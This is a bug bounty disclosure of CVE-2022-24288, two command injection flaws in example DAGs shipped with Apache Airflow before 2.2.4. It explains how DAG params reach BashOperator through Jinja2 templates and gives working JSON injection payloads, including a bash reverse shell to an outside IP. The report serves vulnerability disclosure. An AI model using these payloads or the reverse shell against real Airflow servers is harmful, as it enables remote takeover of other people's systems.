Happyhacking123H1:1492896Internet Bug Bounty: CVE-2022-24288: Apache Airflow: TWO RCEs in example DAGs
EPSS
Percentile
99.3%
In Apache Airflow, prior to version 2.2.4, In DAG script of airflow , there is two command injection vulnerability (RCE) in the some scripts, which an attacker can execute arbitrary commands on the system. The impact is even greater when airflow is configured for unauthenticated access. These two RCEs are assigned the same CVE number(CVE-2022-24288)
Impact
#RCE one: example_passing_params_via_test_command.py command injection
##Vulnerability summary:
In Apache Airflow, prior to version 2.2.4, there is a command injection vulnerability (RCE) in the script (example_passing_params_via_test_command.py), which can obtain the permission of the operating system.
##Vulnerability principle:
- It can be seen from the source code of example_passing_params_via_test_command script that there is the function of executing bash command, The parameters Foo and MIFF in the template expressions {{params. Foo}} and {{params. Foo}} are externally controllable and rendered through the jiaja2 template:
{F1634883}
{F1634884}
2. Further analysis “from airflow.operators.bash import BashOperator” code, we can see bash_command parameter value will be executed as a bash script;
{F1634885}
##Vulnerability exploitation :
- Enter the DAGs menu and start example_passing_params_via_test_command task, select “Trigger DAG w/ config”.
http://192.168.3.17:8080/trigger?dag_id=example_passing_params_via_test_command
{F1634887}
2. To construct payload, we can know from the following code that we need to splice commands with semicolons after closing double quotation marks, so as to inject any operating system commands to be executed(RCE).
{F1634888}
PAYLOAD:{"foo":"\";touch /tmp/pwnedaaaaa;\""}, Then click trigger to execute the task.
{F1634889}
{F1634890}
Through the log and background view, it can be seen that any command has been executed successfully.
{F1634891}
{F1634892}
3. Further execute the reverse shell to obtain operating system permissions.
Payload: {"foo":"\";bash -i >& /dev/tcp/192.168.3.7/6666 0>&1;\""}
{F1634893}
{F1634894}
#RCE two: tutorial.py DAG command injection
##Vulnerability summary:
Ithere is a command injection vulnerability (RCE) in the script (tutorial.py), which an attacker can execute arbitrary commands on the system.
##Vulnerability principle:
- It can be seen from the source code of tutorial script that there is the function of executing bash command, The parameters “my_param” in the template expressions {{params.my_param}} is externally controllable and rendered through the jinja2 template:
{F1634906}
2. Further analysis “from airflow.operators.bash import BashOperator” code, we can see bash_command parameter value will be executed as a bash script;
{F1634907}
#Vulnerability exploitation:
- Enter the DAGs menu and start tutorial task, select “Trigger DAG w/ config”.
http://192.168.3.17:8080/trigger?dag_id=tutorial
{F1634908}
2. To construct payload, we can know from the following code that we need to splice commands with semicolons after closing double quotation marks, so as to inject any operating system commands to be executed(RCE).
{F1634913}
PAYLOAD:{"my_param":"\";touch /tmp/pwnedddddd;\""}, Then click trigger to execute the task.
{F1634915}
{F1634916}
Through the log and background view, it can be seen that arbitrary command has been executed successfully.
{F1634917}
Related
